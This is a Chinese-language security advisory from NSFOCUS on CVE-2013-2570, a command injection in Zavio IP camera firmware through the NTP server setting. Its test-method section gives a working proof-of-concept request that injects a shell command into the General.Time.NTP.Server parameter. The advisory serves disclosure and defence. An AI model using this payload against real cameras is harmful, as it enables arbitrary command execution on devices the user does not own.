安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Zavio IP Cameras OS 命令注入漏洞(CVE-2013-2570)
发布日期:
2013-05-28
更新日期:
2013-05-29
受影响系统:
Zavio Zavio IP Cameras <= 1.6.03
描述:
BUGTRAQ ID:
60188
CVE(CAN) ID:
CVE-2013-2570
Zavio IP Cameras是网络摄像机产品。
Zavio IP Cameras 1.6.03及更早版本二进制 '/opt/cgi/view/param'内的函数'sub_C8C8'存在命令注入漏洞,有漏洞的参数是'General.Time.NTP.Server'。通过执行'/sbin/awpriv
ra0 get_site_survey'可获取完整的访问点列表,导致在受影响设备上下文中执行任意命令。
<*来源:Nahuel Riva
Francisco Falcon
链接:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/89865?page=last
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<a href="
http://www.example.com/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off">http://www.example.com/cgi-bin/admin/param?action=update&General.Time.Date...</a>
建议:
厂商补丁:
Zavio
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zavio.com/
浏览次数:
4487
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客
